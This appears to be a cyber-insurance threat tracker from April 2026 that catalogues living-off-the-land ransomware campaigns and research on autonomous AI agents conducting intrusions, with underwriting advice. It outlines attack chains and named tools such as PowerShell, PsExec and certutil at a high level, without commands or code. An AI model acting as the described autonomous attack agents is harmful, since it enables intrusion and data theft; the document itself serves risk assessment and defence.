LOTL 2.0 Incident Tracker: Documented Cases of AI-Augmented Living-Off-the-Land Attacks (2025–2026)

This is a living document. As evidence of autonomous or AI-augmented LOTL attacks accumulates, we’ll update this tracker with new cases, analysis, and underwriting implications. Each entry documents the tradecraft observed, the degree of automation suspected, and the relevance to cyber insurance risk assessment.

Last updated: April 2026

---

How to Read This Tracker

Each incident is classified along two dimensions:

Automation Level:

• 🟢 Human-operated, LOTL tradecraft — human attacker using LOLBINs; no AI involvement detected
• 🟡 AI-assisted — human operator with AI tools supporting reconnaissance, payload generation, or tradecraft selection
• 🔴 Suspected autonomous — indicators suggest agent-driven execution with minimal human oversight

Confidence:

• Confirmed — publicly reported with technical analysis from credible sources
• Assessed — based on analysis of public reporting; automation level inferred from tradecraft patterns
• Speculative — indicators suggest possible AI involvement but evidence is limited

---

Active Campaigns

1. Storm-1175 / Medusa Ransomware Campaign

Field	Detail
Period	Active throughout 2025–2026
Targets	Healthcare, education, technology sectors globally
Automation	🟢 Human-operated, LOTL tradecraft
Confidence	Confirmed
Sources	Microsoft Threat Intelligence, multiple vendor reports

Attack Chain:

1. Initial access via phishing emails with malicious attachments
2. PowerShell execution for reconnaissance and payload delivery
3. Credential harvesting using in-memory techniques
4. Lateral movement via PsExec and Impacket
5. Data exfiltration before encryption
6. Ransomware deployment using batch scripts

LOTL Tools Used:

• PowerShell (execution, recon, credential access)
• PsExec (lateral movement)
• Impacket (authentication manipulation, lateral movement)
• Scheduled tasks (persistence)
• Certutil (data staging and potential exfiltration)

Underwriting Significance: This campaign represents the current “baseline” of LOTL-dominant ransomware operations. While the execution is human-operated, the tradecraft is precisely the playbook that autonomous agents are being trained to replicate. Key observations:

• Dwell time: Extended (days to weeks), but compression is expected as automation increases
• Detection opportunity: The tradecraft is detectable with behavioral analytics, but most mid-market victims lacked this capability
• Claims impact: Multiple insureds affected across the cyber market, contributing to frequency trends in healthcare and education

LOTL 2.0 Trajectory: This campaign’s tradecraft is the template for autonomous execution. Every tool and technique used here has been demonstrated in autonomous attack research frameworks.

---

2. Asian Critical Infrastructure Intrusion Campaign

Field	Detail
Period	Identified late 2025, ongoing
Targets	Critical infrastructure — energy, transportation, telecommunications
Automation	🟡 AI-assisted (assessed)
Confidence	Assessed
Sources	Government advisories, sector-specific threat intelligence

Attack Chain:

1. Supply chain compromise for initial access to target environments
2. Extended reconnaissance using native system tools
3. Custom malware combined with modified open-source utilities
4. LOLBIN maintenance for persistent, low-visibility access
5. Slow, deliberate lateral movement across operational technology networks

LOTL Tools Used:

• Native system administration tools for reconnaissance
• Legitimate remote management software for persistence
• Modified open-source tools (RedTeam tooling) for specific operations
• Custom malware reserved for high-value operations only

Underwriting Significance: This campaign is significant because of the blended approach — custom malware for specific objectives, but LOLBINs for the majority of day-to-day operations within the target environment. This suggests:

• Attackers are conserving custom tooling for when it’s truly needed (reducing detection risk)
• LOLBIN operations are the default, not the fallback
• The patience and operational security discipline is consistent with either highly skilled human operators or well-tuned autonomous agents

The automation assessment (🟡): The speed and consistency of operations across multiple targets, combined with the adaptive tradecraft, suggests some level of AI assistance. Full autonomous operation is not confirmed, but the tradecraft is consistent with agent-supported workflows.

---

3. RapidPen Research Demonstrations

Field	Detail
Period	Published 2025
Targets	Research environments (demonstrated capability, not wild deployment)
Automation	🔴 Fully autonomous
Confidence	Confirmed (academic publication)

What Was Demonstrated: Full IP-to-shell compromise with no human intervention. Starting from only a target IP address, the agent performed:

1. Automated reconnaissance and service enumeration
2. Vulnerability identification and selection
3. Exploit execution
4. Post-compromise operations (privilege escalation, persistence)

Underwriting Significance: While this is a research demonstration rather than a wild incident, it’s important for underwriters because:

• Capability is proven: The question is no longer “can agents do this?” but “when will it be widely deployed?”
• Time-to-compromise: The autonomous execution significantly compresses the initial access phase
• Adaptability: The agent adjusted its approach based on what it found — this is qualitatively different from static exploit scripts

LOTL 2.0 Connection: The post-compromise phase in RapidPen includes LOLBIN usage for privilege escalation and persistence — the exact tradecraft that makes autonomous LOTL operations viable.

---

4. AutoAttacker Post-Breach Automation

Field	Detail
Period	Published 2025
Targets	Research environments (14 distinct attack scenarios)
Automation	🔴 Fully autonomous
Confidence	Confirmed (academic publication)

What Was Demonstrated: High success rate in automating 14 “hands-on-keyboard” post-breach techniques across different operating systems. The agent:

• Made context-dependent decisions about which technique to use
• Adapted when initial approaches failed
• Maintained operational consistency across extended attack chains
• Replicated the decision-making of a skilled human operator

Underwriting Significance: This research directly addresses the “post-breach” phase that matters most for cyber insurance claims:

• Dwell time compression: The agent operates faster than human responders
• Coverage implications: “Time to detect and respond” metrics in policies may need recalibration
• Detection requirements: Only behavioral analytics and identity-based controls can distinguish agent-driven LOTL operations from legitimate administration

---

Monitoring: Campaigns to Watch

These campaigns show LOTL-heavy tradecraft that may be approaching AI augmentation:

5. Akira Ransomware Variant Campaign

Field	Detail
Period	Active 2025–2026
Targets	Broad — SMB to mid-market
Automation	🟢 Human-operated, heavy LOTL
Watch For	Accelerating operation speed, parallel targeting patterns

Akira operators have been among the most prolific users of LOTL techniques. The campaign uses VPN exploitation for initial access followed by extensive LOLBIN usage internally. If this group begins deploying autonomous agents, the frequency impact on the cyber market would be significant due to their broad targeting scope.

6. BlackSuit / Royal Ransomware Evolution

Field	Detail
Period	Evolving through 2025–2026
Targets	Healthcare, manufacturing, education
Automation	🟢 Human-operated, LOTL components
Watch For	Adoption of AI-generated phishing for initial access, automated post-breach

The Royal/BlackSuit lineage has shown consistent evolution in tradecraft. Their use of LOLBINs for lateral movement and data staging is well-documented. The group’s willingness to adopt new techniques makes them a leading candidate for early adoption of agent-assisted operations.

---

Research Pipeline: Capabilities Not Yet Deployed

These demonstrated capabilities exist in research settings and are candidates for wild deployment:

Agent-Based Red Team Automation

Multiple research teams have published frameworks for autonomous red team operations. These frameworks combine LLM-based decision-making with established attack tools. The gap between research capability and criminal deployment is narrowing.

Autonomous Lateral Movement

Research on agent-driven lateral movement demonstrates the ability to navigate complex network topologies, adapt to encountered defenses, and maintain operational security — all without human direction.

Self-Modifying LOTL Chains

Emerging research on agents that modify their own attack chains based on encountered defenses. This goes beyond pre-programmed “if-then” logic to genuine adaptation — the agent learns from the target environment and adjusts its approach.

---

Underwriting Takeaways

For Current Portfolio Assessment

1. Frequency assumption: The campaigns documented above support a +10–20% frequency adjustment for portfolios with significant mid-market exposure, reflecting the approaching commoditization of LOTL tradecraft.

2. Severity monitoring: Current incidents show consistent severity levels (ransom demands, BI duration). The risk is primarily frequency-driven at this stage.

3. Correlation risk: Storm-1175’s broad targeting demonstrates that a single threat group can generate correlated claims across a portfolio. Agent-driven operations will amplify this.

For Risk Selection

4. Control prioritization: The documented attack chains confirm that behavioral analytics and identity-based controls are the most effective defenses against the observed tradecraft.

5. Sector exposure: Healthcare and education remain heavily targeted sectors — the LOTL 2.0 evolution will likely expand targeting to previously lower-frequency sectors like professional services and retail.

For Claims and Forensics

6. Investigation complexity: LOTL-dominant incidents generate more complex forensic investigations. Adjust expected forensic costs upward, especially for insureds without comprehensive logging.

7. Attribution challenges: The “no custom malware” signature of LOTL operations makes attribution more difficult, which can complicate subrogation efforts and coverage disputes.

---

Update Log

Date	Update
April 2026	Initial tracker published with 6 entries
—	Next update: New incidents, campaign evolution analysis

---

This tracker is maintained as part of our LOTL 2.0 Series. Start from the beginning: Living-Off-the-Land 2.0 foundational analysis →

If you have threat intelligence relevant to this tracker, or want to discuss the underwriting implications for your portfolio, reach out to the Resiliently team.